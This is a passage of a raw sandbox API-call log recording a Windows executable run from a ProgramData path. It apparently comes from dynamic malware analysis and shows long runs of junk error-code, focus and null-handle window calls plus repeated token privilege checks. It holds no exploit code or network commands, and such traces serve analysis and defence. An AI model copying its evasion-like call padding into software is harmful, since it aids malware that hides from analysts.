¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x1e\x82½1\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0083.859] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x55842c78, nSize=0x104 | out: lpFilename="C:\\ProgramData\\BCE1010314.exe" (normalized: "c:\\programdata\\bce1010314.exe")) returned 0x1d [0083.859] GetLastError () returned 0x0 [0083.859] SetLastError (dwErrCode=0x0) [0083.859] GetLastError () returned 0x0 [0083.859] SetLastError (dwErrCode=0x0) [0083.859] GetLastError () returned 0x0 [0083.859] SetLastError (dwErrCode=0x0) [0083.859] GetLastError () returned 0x0 [0083.859] SetLastError (dwErrCode=0x0) [0083.859] GetLastError () returned 0x0 [0083.859] SetLastError (dwErrCode=0x0) [0083.859] GetLastError () returned 0x0 [0083.859] SetLastError (dwErrCode=0x0) [0083.859] GetLastError () returned 0x0 [0083.859] SetLastError (dwErrCode=0x0) [0083.859] GetLastError () returned 0x0 [0083.859] SetLastError (dwErrCode=0x0) [0083.859] GetLastError () returned 0x0 [0083.859] SetLastError (dwErrCode=0x0) [0083.859] GetLastError () returned 0x0 [0083.859] SetLastError (dwErrCode=0x0) [0083.859] GetLastError () returned 0x0 [0083.860] SetLastError (dwErrCode=0x0) [0083.860] GetLastError () returned 0x0 [0083.860] SetLastError (dwErrCode=0x0) [0083.860] GetLastError () returned 0x0 [0083.860] SetLastError (dwErrCode=0x0) [0083.860] GetLastError () returned 0x0 [0083.860] SetLastError (dwErrCode=0x0) [0083.860] GetLastError () returned 0x0 [0083.860] SetLastError (dwErrCode=0x0) [0083.860] GetLastError () returned 0x0 [0083.860] SetLastError (dwErrCode=0x0) [0083.860] GetLastError () returned 0x0 [0083.860] SetLastError (dwErrCode=0x0) [0083.860] GetLastError () returned 0x0 [0083.860] SetLastError (dwErrCode=0x0) [0083.860] GetLastError () returned 0x0 [0083.860] SetLastError (dwErrCode=0x0) [0083.860] GetLastError () returned 0x0 [0083.860] SetLastError (dwErrCode=0x0) [0083.860] GetLastError () returned 0x0 [0083.860] SetLastError (dwErrCode=0x0) [0083.860] GetLastError () returned 0x0 [0083.860] SetLastError (dwErrCode=0x0) [0083.860] GetLastError () returned 0x0 [0083.860] SetLastError (dwErrCode=0x0) [0083.860] GetLastError () returned 0x0 [0083.860] SetLastError (dwErrCode=0x0) [0083.860] GetLastError () returned 0x0 [0083.860] SetLastError (dwErrCode=0x0) [0083.861] GetLastError () returned 0x0 [0083.861] SetLastError (dwErrCode=0x0) [0083.861] GetLastError () returned 0x0 [0083.861] SetLastError (dwErrCode=0x0) [0083.861] GetLastError () returned 0x0 [0083.861] SetLastError (dwErrCode=0x0) [0083.861] GetLastError () returned 0x0 [0083.861] SetLastError (dwErrCode=0x0) [0083.861] GetLastError () returned 0x0 [0083.861] SetLastError (dwErrCode=0x0) [0083.861] GetLastError () returned 0x0 [0083.861] SetLastError (dwErrCode=0x0) [0083.861] GetLastError () returned 0x0 [0083.861] SetLastError (dwErrCode=0x0) [0083.861] GetLastError () returned 0x0 [0083.861] SetLastError (dwErrCode=0x0) [0083.861] GetLastError () returned 0x0 [0083.861] SetLastError (dwErrCode=0x0) [0083.861] GetLastError () returned 0x0 [0083.861] SetLastError (dwErrCode=0x0) [0083.861] GetLastError () returned 0x0 [0083.861] SetLastError (dwErrCode=0x0) [0083.861] GetLastError () returned 0x0 [0083.861] SetLastError (dwErrCode=0x0) [0083.861] GetLastError () returned 0x0 [0083.861] SetLastError (dwErrCode=0x0) [0083.861] GetLastError () returned 0x0 [0083.861] SetLastError (dwErrCode=0x0) [0083.861] GetLastError () returned 0x0 [0083.861] SetLastError (dwErrCode=0x0) [0083.861] GetLastError () returned 0x0 [0083.861] SetLastError (dwErrCode=0x0) [0083.862] GetLastError () returned 0x0 [0083.862] SetLastError (dwErrCode=0x0) [0083.862] GetLastError () returned 0x0 [0083.862] SetLastError (dwErrCode=0x0) [0083.862] GetLastError () returned 0x0 [0083.862] SetLastError (dwErrCode=0x0) [0083.862] GetLastError () returned 0x0 [0083.862] SetLastError (dwErrCode=0x0) [0083.862] GetLastError () returned 0x0 [0083.862] SetLastError (dwErrCode=0x0) [0083.862] GetLastError () returned 0x0 [0083.862] SetLastError (dwErrCode=0x0) [0083.862] GetLastError () returned 0x0 [0083.862] SetLastError (dwErrCode=0x0) [0083.862] GetLastError () returned 0x0 [0083.862] SetLastError (dwErrCode=0x0) [0083.862] GetLastError () returned 0x0 [0083.862] SetLastError (dwErrCode=0x0) [0083.862] GetLastError () returned 0x0 [0083.862] SetLastError (dwErrCode=0x0) [0083.862] GetLastError () returned 0x0 [0083.862] SetLastError (dwErrCode=0x0) [0083.862] GetLastError () returned 0x0 [0083.862] SetLastError (dwErrCode=0x0) [0083.862] GetLastError () returned 0x0 [0083.862] SetLastError (dwErrCode=0x0) [0083.862] GetLastError () returned 0x0 [0083.863] SetLastError (dwErrCode=0x0) [0083.863] GetLastError () returned 0x0 [0083.863] SetLastError (dwErrCode=0x0) [0083.863] GetLastError () returned 0x0 [0083.863] SetLastError (dwErrCode=0x0) [0083.863] GetLastError () returned 0x0 [0083.863] SetLastError (dwErrCode=0x0) [0083.863] GetLastError () returned 0x0 [0083.863] SetLastError (dwErrCode=0x0) [0083.863] GetLastError () returned 0x0 [0083.863] SetLastError (dwErrCode=0x0) [0083.864] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0083.864] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0083.864] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x558339aa) returned 0x0 [0083.865] GetLastError () returned 0x0 [0083.865] SetLastError (dwErrCode=0x0) [0083.865] GetLastError () returned 0x0 [0083.865] SetLastError (dwErrCode=0x0) [0083.865] GetLastError () returned 0x0 [0083.865] SetLastError (dwErrCode=0x0) [0083.865] GetLastError () returned 0x0 [0083.865] SetLastError (dwErrCode=0x0) [0083.865] GetLastError () returned 0x0 [0083.865] SetLastError (dwErrCode=0x0) [0083.865] GetLastError () returned 0x0 [0083.865] SetLastError (dwErrCode=0x0) [0083.865] GetLastError () returned 0x0 [0083.865] SetLastError (dwErrCode=0x0) [0083.865] GetLastError () returned 0x0 [0083.865] SetLastError (dwErrCode=0x0) [0083.865] GetLastError () returned 0x0 [0083.865] SetLastError (dwErrCode=0x0) [0083.865] GetLastError () returned 0x0 [0083.865] SetLastError (dwErrCode=0x0) [0083.865] GetLastError () returned 0x0 [0083.865] SetLastError (dwErrCode=0x0) [0083.865] GetLastError () returned 0x0 [0083.865] SetLastError (dwErrCode=0x0) [0083.865] GetLastError () returned 0x0 [0083.865] SetLastError (dwErrCode=0x0) [0083.865] GetLastError () returned 0x0 [0083.865] SetLastError (dwErrCode=0x0) [0083.865] GetLastError () returned 0x0 [0083.865] SetLastError (dwErrCode=0x0) [0083.865] GetLastError () returned 0x0 [0083.866] SetLastError (dwErrCode=0x0) [0083.866] GetLastError () returned 0x0 [0083.866] SetLastError (dwErrCode=0x0) [0083.866] GetLastError () returned 0x0 [0083.866] SetLastError (dwErrCode=0x0) [0083.866] GetLastError () returned 0x0 [0083.866] SetLastError (dwErrCode=0x0) [0083.866] GetLastError () returned 0x0 [0083.866] SetLastError (dwErrCode=0x0) [0083.866] GetLastError () returned 0x0 [0083.866] SetLastError (dwErrCode=0x0) [0083.866] GetLastError () returned 0x0 [0083.866] SetLastError (dwErrCode=0x0) [0083.866] GetLastError () returned 0x0 [0083.866] SetLastError (dwErrCode=0x0) [0083.866] GetLastError () returned 0x0 [0083.866] SetLastError (dwErrCode=0x0) [0083.866] GetLastError () returned 0x0 [0083.866] SetLastError (dwErrCode=0x0) [0083.866] GetLastError () returned 0x0 [0083.866] SetLastError (dwErrCode=0x0) [0083.866] GetLastError () returned 0x0 [0083.866] SetLastError (dwErrCode=0x0) [0083.866] GetLastError () returned 0x0 [0083.866] SetLastError (dwErrCode=0x0) [0083.866] GetLastError () returned 0x0 [0083.866] SetLastError (dwErrCode=0x0) [0083.866] GetLastError () returned 0x0 [0083.866] SetLastError (dwErrCode=0x0) [0083.866] GetLastError () returned 0x0 [0083.866] SetLastError (dwErrCode=0x0) [0083.867] IsClipboardFormatAvailable (format=0x0) returned 0 [0083.867] IsDlgButtonChecked (hDlg=0x0, nIDButton=0) returned 0x0 [0083.867] InflateRect (in: lprc=0x18f7a8, dx=1, dy=1 | out: lprc=0x18f7a8) returned 1 [0083.867] GetFocus () returned 0x0 [0083.868] GetConsoleTitleA (in: lpConsoleTitle=0x181870, nSize=0x400 | out: lpConsoleTitle="") returned 0x0 [0083.868] GetLastError () returned 0x578 [0083.868] SetLastError (dwErrCode=0x578) [0083.868] UpdateWindow (hWnd=0x76f) returned 0 [0083.868] GetLastError () returned 0x578 [0083.868] CreateMenu () returned 0x100f5 [0083.868] CreatePopupMenu () returned 0x100f7 [0083.868] CreatePopupMenu () returned 0x100f9 [0083.868] SetMenu (hWnd=0x0, hMenu=0x100f5) returned 0 [0083.868] SetCapture (hWnd=0x0) returned 0x0 [0083.868] InvalidateRect (hWnd=0x0, lpRect=0x0, bErase=1) returned 1 [0083.869] OleLoadPicture () returned 0x80004003 [0083.869] InvalidateRect (hWnd=0x0, lpRect=0x0, bErase=1) returned 1 [0083.869] QuerySecurityPackageInfoA (in: pszPackageName=0x0, ppPackageInfo=0x0 | out: ppPackageInfo=0x0) returned 0x80090305 [0083.878] GetCapture () returned 0x0 [0083.878] BeginPaint (in: hWnd=0x0, lpPaint=0x18eaf0 | out: lpPaint=0x18eaf0) returned 0x0 [0083.878] EndPaint (hWnd=0x0, lpPaint=0x18eaf0) returned 0 [0083.878] NtdllDefWindowProc_A (hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x0 [0084.619] GetDeviceCaps (hdc=0x1, index=4) returned 0 [0084.619] GetDeviceCaps (hdc=0x1, index=6) returned 0 [0084.619] GetDeviceCaps (hdc=0x1, index=8) returned 0 [0084.619] GetDeviceCaps (hdc=0x1, index=10) returned 0 [0084.619] GetEnhMetaFileA (lpName="emf") returned 0x0 [0084.619] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x6c, lpEnhMetaHeader=0x18ecc8 | out: lpEnhMetaHeader=0x18ecc8) returned 0x0 [0084.619] PlayEnhMetaFile (hdc=0x0, hmf=0x0, lprect=0x18f7b8) returned 0 [0084.619] DeleteEnhMetaFile (hmf=0x0) returned 0 [0084.619] GetSystemMenu (hWnd=0x0, bRevert=0) returned 0x0 [0084.619] EnableMenuItem (hMenu=0x0, uIDEnableItem=0xf060, uEnable=0x1) returned 1 [0084.619] SetFocus (hWnd=0x0) returned 0x0 [0084.619] SetFocus (hWnd=0x0) returned 0x0 [0084.620] SetFocus (hWnd=0x0) returned 0x0 [0084.620] SetFocus (hWnd=0x0) returned 0x0 [0084.620] SetFocus (hWnd=0x0) returned 0x0 [0084.620] SetFocus (hWnd=0x0) returned 0x0 [0084.620] SetFocus (hWnd=0x0) returned 0x0 [0084.620] SetFocus (hWnd=0x0) returned 0x0 [0084.620] SetFocus (hWnd=0x0) returned 0x0 [0084.620] SetFocus (hWnd=0x0) returned 0x0 [0084.620] SetFocus (hWnd=0x0) returned 0x0 [0084.620] SetFocus (hWnd=0x0) returned 0x0 [0084.620] SetFocus (hWnd=0x0) returned 0x0 [0084.620] SetFocus (hWnd=0x0) returned 0x0 [0084.620] SetFocus (hWnd=0x0) returned 0x0 [0084.620] SetFocus (hWnd=0x0) returned 0x0 [0084.620] SetFocus (hWnd=0x0) returned 0x0 [0084.620] SetFocus (hWnd=0x0) returned 0x0 [0084.620] SetFocus (hWnd=0x0) returned 0x0 [0084.620] SetFocus (hWnd=0x0) returned 0x0 [0084.620] SetFocus (hWnd=0x0) returned 0x0 [0084.620] SetFocus (hWnd=0x0) returned 0x0 [0084.620] SetFocus (hWnd=0x0) returned 0x0 [0084.620] SetFocus (hWnd=0x0) returned 0x0 [0084.620] SetFocus (hWnd=0x0) returned 0x0 [0084.620] SetFocus (hWnd=0x0) returned 0x0 [0084.620] SetFocus (hWnd=0x0) returned 0x0 [0084.620] SetFocus (hWnd=0x0) returned 0x0 [0084.620] SetFocus (hWnd=0x0) returned 0x0 [0084.620] SetFocus (hWnd=0x0) returned 0x0 [0084.620] SetFocus (hWnd=0x0) returned 0x0 [0084.620] SetFocus (hWnd=0x0) returned 0x0 [0084.620] SetFocus (hWnd=0x0) returned 0x0 [0084.620] SetFocus (hWnd=0x0) returned 0x0 [0084.620] SetFocus (hWnd=0x0) returned 0x0 [0084.620] SetFocus (hWnd=0x0) returned 0x0 [0084.620] SetFocus (hWnd=0x0) returned 0x0 [0084.620] SetFocus (hWnd=0x0) returned 0x0 [0084.620] SetFocus (hWnd=0x0) returned 0x0 [0084.620] SetFocus (hWnd=0x0) returned 0x0 [0084.620] SetFocus (hWnd=0x0) returned 0x0 [0084.620] SetFocus (hWnd=0x0) returned 0x0 [0084.620] SetFocus (hWnd=0x0) returned 0x0 [0084.620] SetFocus (hWnd=0x0) returned 0x0 [0084.620] SetFocus (hWnd=0x0) returned 0x0 [0084.620] SetFocus (hWnd=0x0) returned 0x0 [0084.620] SetFocus (hWnd=0x0) returned 0x0 [0084.620] SetFocus (hWnd=0x0) returned 0x0 [0084.621] SetFocus (hWnd=0x0) returned 0x0 [0084.621] SetFocus (hWnd=0x0) returned 0x0 [0084.621] SetFocus (hWnd=0x0) returned 0x0 [0084.621] SetFocus (hWnd=0x0) returned 0x0 [0084.621] GetModuleHandleA (lpModuleName="kernel32") returned 0x75ce0000 [0084.621] IsWindow (hWnd=0x0) returned 0 [0084.621] EnableMenuItem (hMenu=0x0, uIDEnableItem=0xc, uEnable=0x0) returned 1 [0084.621] SendMessageA (hWnd=0x0, Msg=0x405, wParam=0x0, lParam=0x0) returned 0x0 [0084.621] GetProcAddress (hModule=0x75ce0000, lpProcName="HeapCreate") returned 0x75cf4a2d [0084.623] SHGetMalloc (in: ppMalloc=0x18fe4c | out: ppMalloc=0x18fe4c*=0x764966bc) returned 0x0 [0084.624] SHGetDesktopFolder (in: ppshf=0x18fe48 | out: ppshf=0x18fe48*=0x291834) returned 0x0 [0084.648] IShellFolder:ParseDisplayName (in: This=0x291834, hwnd=0x0, pbc=0x0, pszDisplayName="", pchEaten=0x18f4a4*=0xf000e, ppidl=0x18fe40, pdwAttributes=0x18f4b8*=0x90008 | out: pchEaten=0x18f4a4*=0xf000e, ppidl=0x18fe40, pdwAttributes=0x18f4b8*=0x90008) returned 0x0 [0084.649] IUnknown:Release (This=0x291834) returned 0x0 [0084.649] IUnknown:AddRef (This=0x764966bc) returned 0x1 [0084.649] SendMessageA (hWnd=0x0, Msg=0xba, wParam=0x0, lParam=0x0) returned 0x0 [0084.649] SendMessageA (hWnd=0x0, Msg=0xc9, wParam=0xffffffff, lParam=0x0) returned 0x0 [0084.649] SendMessageA (hWnd=0x0, Msg=0xbb, wParam=0xffffffff, lParam=0x0) returned 0x0 [0084.649] SendMessageA (hWnd=0x0, Msg=0xb0, wParam=0x0, lParam=0x0) returned 0x0 [0084.649] SendDlgItemMessageA (hDlg=0x1, nIDDlgItem=130330996, Msg=0x401, wParam=0x2, lParam=0x18f3ac) returned 0x0 [0084.649] GetLastError () returned 0x578 [0084.649] SetLastError (dwErrCode=0x578) [0084.649] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.674] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.674] GetLastError () returned 0x578 [0084.674] SetLastError (dwErrCode=0x578) [0084.674] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.674] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.674] GetCurrentThread () returned 0xfffffffe [0084.674] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.674] GetLastError () returned 0x3f0 [0084.674] GetCurrentProcess () returned 0xffffffff [0084.674] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.674] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.674] SetLastError (dwErrCode=0x522) [0084.674] CloseHandle (hObject=0x114) returned 1 [0084.674] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.674] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.674] GetLastError () returned 0x578 [0084.674] SetLastError (dwErrCode=0x578) [0084.674] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.674] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.674] GetCurrentThread () returned 0xfffffffe [0084.674] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.674] GetLastError () returned 0x3f0 [0084.674] GetCurrentProcess () returned 0xffffffff [0084.674] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.674] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.675] SetLastError (dwErrCode=0x522) [0084.675] CloseHandle (hObject=0x114) returned 1 [0084.675] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.675] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.675] GetLastError () returned 0x578 [0084.675] SetLastError (dwErrCode=0x578) [0084.675] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.675] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.675] GetCurrentThread () returned 0xfffffffe [0084.675] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.675] GetLastError () returned 0x3f0 [0084.675] GetCurrentProcess () returned 0xffffffff [0084.675] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.675] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.675] SetLastError (dwErrCode=0x522) [0084.675] CloseHandle (hObject=0x114) returned 1 [0084.675] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.675] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.675] GetLastError () returned 0x578 [0084.675] SetLastError (dwErrCode=0x578) [0084.675] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.675] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.675] GetCurrentThread () returned 0xfffffffe [0084.675] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.675] GetLastError () returned 0x3f0 [0084.675] GetCurrentProcess () returned 0xffffffff [0084.675] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.675] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.675] SetLastError (dwErrCode=0x522) [0084.675] CloseHandle (hObject=0x114) returned 1 [0084.675] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.675] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.675] GetLastError () returned 0x578 [0084.675] SetLastError (dwErrCode=0x578) [0084.675] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.675] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.675] GetCurrentThread () returned 0xfffffffe [0084.675] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.675] GetLastError () returned 0x3f0 [0084.675] GetCurrentProcess () returned 0xffffffff [0084.675] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.676] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.676] SetLastError (dwErrCode=0x522) [0084.676] CloseHandle (hObject=0x114) returned 1 [0084.676] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.676] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.676] GetLastError () returned 0x578 [0084.676] SetLastError (dwErrCode=0x578) [0084.676] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.676] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.676] GetCurrentThread () returned 0xfffffffe [0084.676] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.676] GetLastError () returned 0x3f0 [0084.676] GetCurrentProcess () returned 0xffffffff [0084.676] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.676] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.676] SetLastError (dwErrCode=0x522) [0084.676] CloseHandle (hObject=0x114) returned 1 [0084.676] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.676] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.676] GetLastError () returned 0x578 [0084.676] SetLastError (dwErrCode=0x578) [0084.676] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.676] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.676] GetCurrentThread () returned 0xfffffffe [0084.676] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.676] GetLastError () returned 0x3f0 [0084.676] GetCurrentProcess () returned 0xffffffff [0084.676] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.676] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.676] SetLastError (dwErrCode=0x522) [0084.676] CloseHandle (hObject=0x114) returned 1 [0084.676] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.676] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.676] GetLastError () returned 0x578 [0084.676] SetLastError (dwErrCode=0x578) [0084.676] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.676] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.676] GetCurrentThread () returned 0xfffffffe [0084.676] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.676] GetLastError () returned 0x3f0 [0084.676] GetCurrentProcess () returned 0xffffffff [0084.676] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.677] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.677] SetLastError (dwErrCode=0x522) [0084.677] CloseHandle (hObject=0x114) returned 1 [0084.677] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.677] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.677] GetLastError () returned 0x578 [0084.677] SetLastError (dwErrCode=0x578) [0084.677] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.677] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.677] GetCurrentThread () returned 0xfffffffe [0084.677] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.677] GetLastError () returned 0x3f0 [0084.677] GetCurrentProcess () returned 0xffffffff [0084.677] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.677] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.677] SetLastError (dwErrCode=0x522) [0084.677] CloseHandle (hObject=0x114) returned 1 [0084.677] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.677] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.677] GetLastError () returned 0x578 [0084.677] SetLastError (dwErrCode=0x578) [0084.677] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.677] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.677] GetCurrentThread () returned 0xfffffffe [0084.677] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.677] GetLastError () returned 0x3f0 [0084.677] GetCurrentProcess () returned 0xffffffff [0084.677] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.677] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.677] SetLastError (dwErrCode=0x522) [0084.677] CloseHandle (hObject=0x114) returned 1 [0084.677] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.677] CM_Get_Device_Interface_List_SizeA (in: 